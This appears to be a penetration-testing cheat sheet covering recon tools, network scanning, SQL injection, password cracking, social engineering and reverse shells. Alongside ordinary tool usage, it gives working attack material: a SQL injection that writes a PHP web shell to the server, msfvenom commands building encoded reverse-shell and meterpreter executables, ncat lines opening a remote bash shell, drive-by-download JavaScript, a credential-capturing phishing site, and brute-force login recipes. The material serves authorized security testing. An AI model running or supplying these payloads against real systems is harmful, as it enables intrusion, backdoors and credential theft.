ivan-sincek / Penetration Testing Cheat Sheet
Projects that are alternatives of or similar to Penetration Testing Cheat Sheet
Penetration Testing Cheat Sheet
This is more of a checklist for myself. May contain useful tips and tricks.
Everything was tested on Kali Linux v2020.3 (64-bit).
For help with any of the tools write <tool_name> -h | -hh | --help or man <tool_name>.
Sometimes -h can be mistaken for a host or some other option. If that's the case, use -hh or --help instead, or read the manual with man.
Some of these tools do similar tasks, but get slightly different results - run everything you can.
Keep in mind when no protocol nor port number within a URL is specified, i.e. somesite.com, some tools might default to HTTP and port 80.
If you didn't already, read the OWASP Testing Guide v4.
Websites that you should use when writing the report:
- cwe.mitre.org/data
- owasp.org/projects
- cheatsheetseries.owasp.org
- nvd.nist.gov/vuln-metrics/cvss/v3-calculator
If you are interested, check my WiFi penetration testing cheat sheet.
Table of Contents
1. Reconnaissance
Keep in mind that some web applications are only accessible through older web browsers like Internet Explorer.
Keep in mind that some web applications may be missing the index page and may not redirect you to the home page at all. If that's the case, try to manually guess a full path to the home page or use DirBuster.
Search the Internet for default paths and files for a specific web application, and possibly use the information gathered in combination with Google Dorks.
Don't forget to access a web server over an IP address because you may find server's default welcome page and some other content.
Inspect the Web Console for possible errors.
Inspect the source code for possible errors and comments.
Optionally, check Recon-ng. Nice tool, but too big to explain.
1.1 Useful Websites
www.exploit-db.com/google-hacking-database
pentest-tools.com/information-gathering/google-hacking
Dmitry
Gather information about a specified domain:
dmitry -winseo dmitry_results.txt somedomain.com
Use this one-liner to extract hostnames from the results:
grep -P -o "(?<=HostName\:)[^\s]+" dmitry_results.txt | sort -u
For more options run man dmitry or dmitry -h.
theHarvester
Gather information about a specified domain:
theHarvester -d somedomain.com -l 500 -b google,bing,yahoo,linkedin -f theHarvester_results.xml
Sometimes the output file might default to /usr/lib/python3/dist-packages/theHarvester directory.
Use this one-liner to extract hostnames from the results:
grep -P -o "(?<=\<hostname\>)[^\s]+?(?=\<\/hostname\>)" theHarvester_results.xml | sort -u
For more options run theHarvester -h.
FOCA (Fingerprinting Organizations with Collected Archives)
Find metadata and hidden information in files.
Tested on Windows 10 Enterprise OS (64-bit).
Setup:
- download and install MS SQL Server 2014 Express or greater,
- download and install MS .NET Framework 4.7.1 Runtime or greater,
- download and install MS Visual C++ 2010 (64-bit) or greater,
- download and install FOCA.
The GUI is very intuitive.
Metagoofil
Search and download specific or all files through Google Dorks:
metagoofil -d somedomain.com -l 100 -n 100 -t pdf -w -o metagoofil_results
Use this one-liner to extract authors from PDFs:
for file in metagoofil_results/*; do pdfinfo $file; done | grep -P -o "(?<=Author\:).+" | sed 's/[[:space:]]//g' | sort -u
For more options run metagoofil -h.
Fierce
Interrogate a domain name server:
fierce -dns somedomain.com -file fierce_std_results.txt
fierce -dns somedomain.com -wordlist dnsmap.txt -file fierce_brt_results.txt
Fierce will by default perform brute force attack with the built-in wordlist.
You can find dnsmap.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/dnsmap.zip.
For more options run fierce -h.
dig
Interrogate a domain name server:
dig somedomain.com ANY +noall +answer
Interrogate a specific domain name server:
dig @192.168.8.5 somedomain.com ANY +noall +answer
Reverse DNS lookup:
dig -x 192.168.8.5 +noall +answer
For more options run man dig or dig -h.
DNSRecon
Interrogate a domain name server:
dnsrecon -d somedomain.com -t std --json /root/Desktop/dnsrecon_std_results.json
dnsrecon -d somedomain.com -t axfr --json /root/Desktop/dnsrecon_axfr_results.json
dnsrecon -d somedomain.com -t brt -D /usr/share/wordlists/dnsmap.txt --json /root/Desktop/dnsrecon_brt_results.json
Use this one-liner to extract hostnames from the zone transfer results:
grep -P -o "(?<=\"name\"\:\ \"|\"mname\"\:\ \"|\"target\"\:\ \"|\"exchange\"\:\ \"|\"replacement\"\:\ \")[^\s\"]+" dnsrecon_axfr_results.json | sort -u
DNSRecon can perform brute force attack with a user-defined wordlist, but make sure you specify a full path to the wordlist; otherwise, DNSRecon might not recognize it.
Also, make sure you specify a full path to an output file; otherwise, it will default to /usr/share/dnsrecon/ directory.
You can find dnsmap.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/dnsmap.zip.
Reverse DNS lookup:
dnsrecon -s -r 192.168.8.0/24 --json /root/Desktop/dnsrecon_reverse_results.json
Use this one-liner to extract hostnames from the reverse DNS lookup results:
grep -P -o "(?<=\"name\"\:\ \")[^\s\"]+" dnsrecon_reverse_results.json | sort -u
For more options run man dnsrecon or dnsrecon -h.
Sublist3r
Installation:
apt-get update && apt-get install sublist3r
Enumerate subdomains using OSINT:
sublist3r -d somedomain.com -o sublist3r_results.txt
For more options run sublist3r -h.
WhatWeb
Identify a website:
whatweb -v somesite.com
For more options run man whatweb or whatweb -h.
DirBuster
Brute force directories and file names on a web server.
Don't forget that GNU/Linux OS has a case sensitive file system.
Don't forget to manually search for robots.txt as it may contain other file names and/or paths.
Don't forget to manually search for phpinfo.php as it may contain valuable information.
DirBuster might take a long time to finish depending on the settings and wordlist used.
| Common Responses |
|---|
| 200 OK |
| 301 Moved Permanently |
| 302 Found |
| 401 Unauthorized |
| 403 Forbidden |
| 404 Not Found |
| 500 Internal Server Error |
| 503 Service Unavailable |
Figure 1 - DirBuster
All DirBuster's wordlists are located at /usr/share/dirbuster/wordlists/ directory.
Parsero
Test all robots.txt entries:
parsero -u somesite.com -sb
For more options run parsero -h.
SecLists
Download a useful collection of multiple types of lists for security assessments.
Installation:
apt-get update && apt-get install seclists
Lists will be stored in /usr/share/seclists/.
Or, download the collection manually from here.
2. Scanning/Enumeration
Keep in mind that web applications can be hosted on other ports besides 80 (HTTP) and 443 (HTTPS), e.g. they can be hosted on port 8443 (HTTPS).
Keep in mind that on ports 80 (HTTP) and 443 (HTTPS) a web server can host different web applications or some other service entirely.
Don't forget to use Ncat and/or Telnet for banner grabbing.
Try to invest into Nessus Professional and Burp Suite Professional or any similar permium tools if you can afford them.
While scanning for vulnerabilities and/or doing any other intensive scans, periodically check the web application/service in case it crashed, so you can alert the client as soon as possible.
2.1 Useful Websites
www.calculator.net/ip-subnet-calculator.html
Nmap
Ping sweep (map live hosts):
nmap -sn 192.168.8.0/24 -oG nmap_ping_sweep_results.txt
nmap -sn 192.168.8.0/24 -oG - | grep -P -o "(?<=Host\:\ )[^\s]+" - > nmap_ping_sweep_results.txt
TCP scan (all ports):
nmap -nv -sS -sV -sC -Pn 192.168.8.0/24 -p- -oN nmap_tcp_results.txt
mkdir -p /nmap_tcp_results/
for ip in $(cat nmap_ping_sweep_results.txt); do nmap -nv -sS -sV -sC -Pn $ip -p- -oN /nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt; done
UDP scan (only important ports):
nmap -nv -sU -sV -sC -Pn 192.168.8.0/24 -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -oN nmap_udp_results.txt
mkdir -p /nmap_udp_results/
for ip in $(cat nmap_ping_sweep_results.txt); do nmap -nv -sU -sV -sC -Pn $ip -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -oN /nmap_udp_results/nmap_udp_results_${ip//./_}.txt; done
| Option | Description |
|---|---|
| -n/-R | Never do DNS resolution/Always resolve (default: sometimes) |
| -v | Increase verbosity level (use -vv or more for greater effect) |
| -Pn | Treat all hosts as online -- skip host discovery |
| -A | Enable OS detection, version detection, script scanning, and traceroute |
| -sS/sT/sA | TCP SYN/Connect()/ACK |
| -sV | Probe open ports to determine service/version info |
| -sn | Ping scan - disable port scan |
| -p/-p- | Only scan specified ports/Scan all ports |
| --top-ports | Scan most common ports |
| --script | Script scan (takes time to finish) |
| --script-args | Provide arguments to scripts |
| --script-help | Show help about scripts |
| -sC | Same as --script=default |
| -O | Enable OS detection |
| --reason | Display the reason a port is in a particular state |
| -oN/-oX/-oG | Output scan in normal, XML, and Grepable format |
For more options run man nmap or nmap -h.
All Nmap's scripts are located at /usr/share/nmap/scripts/ directory. Read more about them here.
NSE examples:
nmap -nv -Pn 192.168.8.5 -p 3306 --script="mysql-brute" --script-args="userdb='users.txt', passdb='rockyou.txt'"
You can find rockyou.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/rockyou.zip.
Try to use IPs instead of domain names.
TO DO: Vulnerability scanning using NSE.
Nikto
Scan a web server:
nikto -h somesite.com -p 80 -output nikto_results.txt
For more options run man nikto or just nikto.
WPScan
Scan a WordPress website:
wpscan --url somesite.com -o wpscan_results.txt
For more options run man wpscan or wpscan -h.
testssl.sh
Setup:
git clone https://github.com/drwetter/testssl.sh
cd testssl.sh
chmod +x testssl.sh
Test an SSL/TLS certificate (i.e. SSL/TLS ciphers, protocols, etc.):
./testssl.sh somesite.com
For more options run ./testssl.sh -hh.
3. Gaining Access
Always try null session login (i.e. no password login) or search the Internet for default credentials for a specific web application.
Try to manipulate cookies to gain access or to elevate privileges.
Try to change an HTTP POST request into an HTTP GET request (i.e. into a query string) and see if server will accept it.
Always remember to delete your backdoors and other artifacts when you are done!
TO DO: HTTP smuggling with smuggler.py.
TO DO: Social engineering with httrack and setoolkit.
3.1 Useful Websites
www.securityfocus.com/vulnerabilities
HTTP Response Splitting
Also known as CRLF Injection. CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n).
Fixate a session cookie:
somesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789
When encoded, \r refers to %0D and \n refers to %0A.
Cross-Site Scripting
Find out more about reflected and stored XSS attacks from my other project.
SQL Injection
Try to produce database errors by injecting a single-quote, back-slash, double-hyphen, forward-slash, or period.
The following examples were tested on MySQL database.
Boolean-based SQLi:
' OR 1=1--
Note that MySQL requires a space between the comment symbol and the next character.
Union-based SQLi:
' UNION SELECT 1, 2, 3, 4--
' UNION SELECT 1, concat_ws(' | ', database(), current_user(), version()), 3, 4--
' UNION SELECT 1, concat_ws(' | ', table_schema, table_name, column_name, data_type, character_maximum_length), 3, 4 FROM information_schema.columns--
' UNION SELECT 1, load_file('..\\..\\apache\\conf\\httpd.conf'), 3, 4--
Use the union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather results.
The goal is to determine the exact number of columns in the application query and to figure out which of them are displaying to the user.
Time-based SQLi:
' AND (SELECT 1 FROM (SELECT sleep(2)) test)--
' AND (SELECT 1 FROM (SELECT CASE current_user() WHEN '[email protected]' THEN sleep(2) ELSE sleep(0) END) test)--
' AND (SELECT 1 FROM (SELECT CASE substring(current_user(), 1, 1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)--
' AND (SELECT CASE substring(password, 1, 1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM schema.users WHERE id = 1)--
Use the time-based SQLi when you are not able to see the results.
Inject a simple web shell:
' UNION SELECT '', '', '', '<?php $output="";if(isset($_SERVER["REQUEST_METHOD"])&&strtolower($_SERVER["REQUEST_METHOD"])==="post"&&isset($_POST["command"])&&strlen(trim($_POST["command"]))>0){$output=htmlentities(shell_exec("(".trim($_POST["command"]).") 2>&1"),ENT_QUOTES,"UTF-8");if(!$output){$output="ERROR: Cannot encode binary output, or no output received.";}} ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" action="<?php echo "./".pathinfo($_SERVER["SCRIPT_FILENAME"],PATHINFO_BASENAME); ?>"><input name="command" type="text" placeholder="Enter Command" autofocus="autofocus"></form><pre><?php echo $output; ?></pre></body></html>' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'--
To successfully inject a web shell, the database user must have a write permission.
Always make sure to properly close the surrounding code.
sqlmap
Inject SQL code into request parameters:
sqlmap -a -u somesite.com/index.php?username=test&password=test
sqlmap -a -u somesite.com/index.php --data username=test&password=test
| Option | Description |
|---|---|
| -u | Target URL |
| --data | Data string to be sent through POST |
| --cookie | HTTP Cookie header value |
| --proxy | Use a proxy to connect to the target URL |
| --level | Level of tests to perform (1-5, default: 1) |
| --risk | Risk of tests to perform (1-3, default: 1) |
| -a | Retrieve everything |
| -b | Retrieve DBMS banner |
| --dump-all | Dump all DBMS databases tables entries |
| --os-shell | Prompt for an interactive operating system shell |
| --os-pwn | Prompt for an OOB shell, Meterpreter, or VNC |
| --sqlmap-shell | Prompt for an interactive sqlmap shell |
| --wizard | Simple wizard interface for beginner users |
For more options run man sqlmap, sqlmap -h, or sqlmap -hh.
dotdotpwn
Traverse a path (e.g. somesite.com/../../etc/shadow):
dotdotpwn -m http -h somesite.com -f /etc/passwd -k "root"
dotdotpwn -m http -S -h somesite.com -f /windows/win.ini -k "mci"
dotdotpwn -m http-url -u https://somesite.com/index.php?file=TRAVERSAL -f /etc/hosts -k "localhost"
| Option | Description |
|---|---|
| -m | Module (http, http-url, ftp, tftp payload, stdout) |
| -h | Hostname |
| -O | Operating System detection for intelligent fuzzing (nmap) |
| -o | Operating System type if known ("windows", "unix", or "generic") |
| -d | Depth of traversals (default: 6) |
| -f | Specific filename (default: according to OS detected) |
| -S | Use SSL for HTTP and Payload module (not needed for http-url) |
| -u | URL with the part to be fuzzed marked as TRAVERSAL |
| -k | Text pattern to match in the response |
| -p | Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword |
| -x | Port to connect (default: HTTP=80; FTP=21; TFTP=69) |
| -U | Username (default: 'anonymous') |
| -P | Password (default: '[email protected]') |
| -M | HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET) |
| -b | Break after the first vulnerability is found |
| -C | Continue if no data was received from host |
For more options simply run dotdotpwn.
Wapiti
Scan a web application for vulnerabilities:
wapiti -v 2 --color -u https://somesite.com/ --scope domain -o wapiti_results -f html
wapiti -v 2 --color -u https://www.somesite.com/ --scope url -a username%password --auth-type basic -o wapiti_results -f html
wapiti-getcookie -u https://somesite.com/app/login.php -c cookies.json
wapiti -v 2 --color -u https://somesite.com/app/ --scope folder -c cookies.json -x https://somesite.com/app/logout.php -o wapiti_results -f html
| Option | Description |
|---|---|
| -u | The base URL used to define the scan scope |
| --scope | Set scan scope (page, folder, domain, url, punk, default: folder) |
| -m | List of modules to load |
| --list-modules | List attack modules and exit |
| -a | Set HTTP authentication credentials (username%password) |
| --auth-type | Set the authentication type to use (basic, digest, kerberos, ntlm) |
| -c | Set a JSON cookie file to use |
| -d | Set how deep the scanner should explore the website |
| -t | Set timeout for requests |
| -f | Set output format (json, html, txt, openvas, vulneranet, xml, default: html) |
| -o | Output file or folder |
| --flush-attacks | Flush attack history and vulnerabilities for the current session |
| --flush-session | Flush everything that was previously found for this target |
For more options run man wapiti, wapiti -h, or wapiti -hh.
| Modules (default) | Modules (optional) |
|---|---|
| blindsql | backup |
| sql | buster |
| exec | crlf |
| file | delay |
| redirect | htaccess |
| ssrf | methods |
| xss | nikto |
| permanentxss | shellshock |
| - | xxe |
PHP Reverse Shell
Find out more about PHP reverse TCP shell from my other project.
Generate a Reverse Shell Payload for Python
Find out how to generate a reverse shell payload for Python and send it to a target machine from my other project.
Generate a Reverse Shell Payload for Windows OS
To generate a Base64 encoded payload use one of the following MSFvenom commands (modify them to your need):
msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff | base64 -w 0 > payload.txt
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff | base64 -w 0 > payload.txt
msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 > payload.txt
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 > payload.txt
To generate a binary file use one of the following MSFvenom commands (modify them to your need):
msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff -o payload.bin
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff -o payload.bin
msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin
To generate a DLL file use one of the following MSFvenom commands (modify them to your need):
msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f dll -b \x00\x0a\x0d\xff -o payload.dll
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f dll -b \x00\x0a\x0d\xff -o payload.dll
To generate a standalone executable file use one of the following MSFvenom commands (modify them to your need):
msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f exe -b \x00\x0a\x0d\xff -o payload.exe
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f exe -b \x00\x0a\x0d\xff -o payload.exe
msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe
To generate an MSI file use one of the following MSFvenom commands (modify them to your need):
msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f msi -b \x00\x0a\x0d\xff -o payload.msi
msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f msi -b \x00\x0a\x0d\xff -o payload.msi
Bytecode might not work on the first try due to some other bad characters. Trial and error is the key.
So far there is no easy way to generate a DLL nor MSI file with a stageless meterpreter shell due to the size issues.
4. Password Cracking
Google a hash before trying to crack it because you might save yourself a lot of time and trouble.
Use Google Dorks to find files and within file's metadata a domain username to brute force or use FOCA.
Keep in mind that you might lockout people's accounts.
Keep in mind that some web forms implement CAPTCHA and/or hidden submission tokens which may prevent you from brute forcing.
You can find a bunch of wordlists located at /usr/share/seclists/ directory.
Also, check the simple one-time-password lists in /dict/otp.zip.
TO DO: Pre-shared key cracking with ike-scan and psk-crack.
4.1 Useful Websites
crunch
Generate a lower-alpha-numeric wordlist:
crunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt
You can see the list of all available charsets or add your own in charset.lst located at /usr/share/crunch/ directory.
Generate all the possible permutations for specified words:
crunch -o crunch_wordlist.txt -p admin 123 \!\"
crunch -o crunch_wordlist.txt -q words.txt
Generate all the possible combinations for a specified charset:
crunch 4 6 -o crunch_wordlist.txt -p admin123\!\"
| Option | Description |
|---|---|
| -d | Limits the number of consecutive characters |
| -f | Specifies a character set from a file |
| -i | Inverts the output |
| -l | When you use the -t option this option tells crunch which symbols should be treated as literals |
| -o | Specifies the file to write the output to |
| -p | Tells crunch to generate/permute words that don't have repeating characters |
| -q | Tells crunch to read a file and permute what is read |
| -r | Tells crunch to resume generate words from where it left off, -r only works if you use -o |
| -s | Specifies a starting string |
| -t | Specifies a pattern |
For more options run man crunch or crunch -h.
| Placeholder | Description |
|---|---|
| @ | Lower case characters |
| , | Upper case characters |
| % | Numbers |
| ^ | Symbols |
Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.
Generate all the possible combinations for a specified placeholder:
crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^
crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^
crunch 10 10 + + 123456 \!\" -o crunch_wordlist.txt -t [email protected]@%^^
crunch 10 10 -o crunch_wordlist.txt -t @[email protected]@%^^ -l @aaaaaaaaa
hash-identifier
To identify a hash type, run the following tool:
hash-identifier
Hashcat
Brute force MD5 hashes:
hashcat -m 0 -a 3 --session=cracking --force --status --optimized-kernel-enable --outfile hashcat_results.txt hashes.txt
Brute force NetNTLMv1 hashes:
hashcat -m 5500 -a 3 --session=cracking --force --status --optimized-kernel-enable --outfile hashcat_results.txt hashes.txt
Use --session=<session_name> so that you can continue your cracking progress later on with --restore.
Continue cracking progress:
hashcat --session=cracking --restore
| Option | Description |
|---|---|
| -m | Hash-type, see references below |
| -a | Attack-mode, see references below |
| --force | Ignore warnings |
| --status | Enable automatic update of the status screen |
| --session | Define specific session name |
| --runtime | Abort session after X seconds of runtime |
| --restore | Restore session from --session |
| --restore-file-path | Specific path to restore file |
| --outfile | Define outfile for recovered hash |
| --show | Show cracked passwords found in potfile |
| --optimized-kernel-enable | Enable optimized kernels (limits password length) |
| -1 | User-defined charset ?1 |
| -2 | User-defined charset ?2 |
| -3 | User-defined charset ?3 |
| -4 | User-defined charset ?4 |
For more options run man hashcat or hashcat -h.
When specifying a user-defined charset, escape ? with another ? (i.e. use ?? instead of \?).
| Hash Type | Description |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 1700 | SHA512 |
| 200 | MySQL323 |
| 300 | MySQL4.1/MySQL5 |
| 1000 | NTLM |
| 5500 | NetNTLMv1-VANILLA / NetNTLMv1-ESS |
| 5600 | NetNTLMv2 |
| 2500 | WPA/WPA2 |
| 16800 | WPA-PMKID-PBKDF2 |
For more hash types read the manual.
| Attack Mode | Name |
|---|---|
| 0 | Straight |
| 1 | Combination |
| 2 | Toggle Case |
| 3 | Brute Force |
| 4 | Permutation |
| 5 | Table Lookup |
| 8 | Prince |
| Charset | Description |
|---|---|
| ?l | abcdefghijklmnopqrstuvwxyz |
| ?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ |
| ?d | 0123456789 |
| ?s | !"#$%&'()*+,-./:;<=>[email protected][]^_`{|}~ |
| ?a | ?l?u?d?s |
| ?b | 0x00 - 0xff |
Dictionary attack:
hashcat -m 100 -a 0 --session=cracking --force --status --optimized-kernel-enable B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt
hashcat -m 5600 -a 0 --session=cracking --force --status --optimized-kernel-enable --outfile hashcat_results.txt hashes.txt rockyou.txt
You can find rockyou.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/rockyou.zip.
Brute force a hash with a specified placeholder:
hashcat -m 0 -a 3 --session=cracking --force --status --optimized-kernel-enable cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2
hashcat -m 0 -a 3 --session=cracking --force --status --optimized-kernel-enable 85fb9a30572c42b19f36d215722e1780 -1 \!\"\#\$\%\&\/\(\)\=??\* -2 ?d?1 ?u?l?l?l?l?2?2?2
Hydra
Crack an HTTP POST web form login:
hydra -l admin -P rockyou.txt somesite.com http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed!" -o hydra_results.txt
When cracking a web form login, you must specify Login=Login:<expected_message> to distinguish between a successful login and failed one. Each expected message can vary between web forms.
Keep in mind that the username and password request parameters can be named differently.
Crack a Secure Shell login:
hydra -L users.txt -P rockyou.txt 192.168.8.5 ssh -o hydra_results.txt
You can find rockyou.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/rockyou.zip.
Also, check the one-time-password lists in /dict/otp.zip.
| Option | Description |
|---|---|
| -R | Restore a previous aborted/crashed session |
| -S | Perform an SSL connect |
| -s | If the service is on a different default port, define it here |
| -l | Login with a login name |
| -L | Load several logins from a file |
| -p | Login with a password |
| -P | Load several passwords from a file |
| -x | Password brute force generation (MIN:MAX:CHARSET), type "-x -h" to get help |
| -y | Disable use of symbols in bruteforce |
| -e | Try "n" null password, "s" login as pass and/or "r" reversed login |
| -M | List of servers to attack, one entry per line, ':' to specify port |
| -f/-F | Exit when a login/pass pair is found (-f per host, -F global) |
| -o | Write found login/password pairs to a file instead of stdout |
| -O | Use old SSL v2 and v3 |
For more options run man hydra or hydra -h.
| Supported Services |
|---|
| ftp[s] |
| http[s]-{get|post}-form |
| mysql |
| smb |
| smtp[s] |
| snmp |
| ssh |
| telnet[s] |
| vnc |
For more supported services read the manual.
| Brute Force Syntax | Description |
|---|---|
| MIN | Minimum number of characters in the password |
| MAX | Maximum number of characters in the password |
| CHARSET | Charset values are: "a" for lowercase letters, "A" for uppercase letters, "1" for numbers, and for all others, just add their real representation |
Brute force attack:
hydra -l admin -x 4:4:aA1\!\"\#\$\% 192.168.8.5 ftp -o hydra_results.txt
Password Spraying
After you have collected enough usernames from reconnaissance phase it is time to try and crack some of them.
Find out how to generate a good password spraying wordlist from my other project, but first you will need a few good keywords that describe your target.
Such keywords can be a company name and abbreviation or keywords that describe your target's services, products, etc.
After you generate the wordlist, use it with tools such as Hydra or Burp Suite Intruder to crack web login forms. P.S. Hydra can attack authentication mechanisms on all kinds of services/ports.
If strong password policy is enforced, passwords usually start with one capitalized word followed by few digits and one special character at the end (e.g. Password123!).
You can also use the generated wordlist with hashcat, e.g. to crack NTLMv2 hashes that you have collected using LLMNR responder, etc.
5. Social Engineering
Find out how to embed a PowerShell script into an MS Word document from my other project.
Drive-by Download
To force users to download a malicious file, copy and paste this JavaScript code block on the cloned web page:
function download(url, type, name, method = 'GET') {
var req = new XMLHttpRequest();
req.open(method, url, true);
req.responseType = 'blob';
req.onload = function() {
var blob = new Blob([req.response], { type: type })
var isIE = false || !!document.documentMode;
if (isIE) {
// IE doesn't allow using a blob object directly as link
// instead it is necessary to use msSaveOrOpenBlob()
if (window.navigator && window.navigator.msSaveOrOpenBlob) {
window.navigator.msSaveOrOpenBlob(blob, name);
}
} else {
var anchor = document.createElement('a');
anchor.href = window.URL.createObjectURL(blob);
anchor.download = name;
anchor.click();
// in Firefox it is necessary to delay revoking the ObjectURL
setTimeout(function() {
window.URL.revokeObjectURL(anchor);
anchor.remove();
}, 250);
}
};
req.send();
}
// specify your file here, use only an absolute URL
download('http://localhost/files/pentest.pdf', 'application/pdf', 'pentest.pdf');
// download('http://localhost/files/pentest.docx', 'plain/txt', 'pentest.docx');
To try it out, copy all the content from \social_engineering\driveby_download\ to your server's web root directory (e.g. to \xampp\htdocs\ on XAMPP), and navigate to the website with your preferred web browser.
Phishing Website
To try it out, copy all the content from \social_engineering\phishing_website\ to your server's web root directory (e.g. to \xampp\htdocs\ on XAMPP), and navigate to the website with your preferred web browser.
Captured credentials will be stored in \social_engineering\phishing_website\logs\credentials.log.
Figure 2 - Phishing Website
Read the comments in \social_engineering\phishing_website\index.php to get a better understanding on how all of it works.
You can modify and expand this template to your liking. You have everything that needs to get you started.
You can easily customize the CSS to make it look more like the company you are testing, e.g. change colors, logo, etc.
Check the standalone redirect templates in \social_engineering\phishing_website\redirects\ directory.
6. Miscellaneous
Here you can find a bunch of random stuff.
6.1 Useful Websites
raikia.com/tool-powershell-encoder
cURL
Download a file:
curl somesite.com/somefile.txt --output somefile.txt
Test a server for various HTTP methods:
curl -v -X TRACE somesite.com
curl -v -X DEBUG somesite.com --insecure
curl -v -X OPTIONS somesite.com --include
curl -v somesite.com --upload-file somefile.txt
For more options run man curl or curl -h.
Ncat
[Server] Set up a listener:
ncat -nvlp 9000
ncat -nvlp 9000 > received_data.txt
ncat -nvlp 9000 -e /bin/bash
ncat -nvlp 9000 -e /bin/bash --ssl
ncat -nvlp 9000 --ssl-cert "sws_crt.pem" --ssl-key "sws_key.pem"
ncat -nvlp 9000 --keep-open <<< "HTTP/1.1 200 OK\r\n\r\n"
[Client] Connect to a remote host:
ncat -nv 192.168.8.5 9000
ncat -nv 192.168.8.5 9000 < sent_data.txt
ncat -nv 192.168.8.5 9000 -e /bin/bash
ncat -nv 192.168.8.5 9000 -e /bin/bash --ssl
ncat -nv 192.168.8.5 9000 --ssl-cert "sws_crt.pem" --ssl-key "sws_key.pem"
Check if it is possible to connect to a specific TCP port (e.g. port 22 or 23):
for i in {0..255}; do ncat -nv 192.168.5.$i 9000 -w 2 -z 2>&1 | grep -P -o "(?<=Connected\ to\ )[^\s]+(?=\.)"; done
for ip in $(cat ips.txt); do ncat -nv $ip 9000 -w 2 -z 2>&1 | grep -P -o "(?<=Connected\ to\ )[^\s]+(?=\.)"; done
For more options run man ncat or ncat -h.
Find out how to create an SSL/TLS certificate from my other project.
multi/handler
Set up a multi/handler module (change the PAYLOAD, LHOST and LPORT as needed):
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 127.0.0.1
set LPORT 9000
exploit
ngrok
Use ngrok to give your local web server a public address (if needed), but do not expose the web server for too long if it is not properly hardened due to security concerns.
I would also advise you not to transfer any sensitive data over it, just in case.
PowerShell Encoded Command
To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))
To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:
PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command
To decode a PowerShell encoded command, run the following PowerShell command:
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))
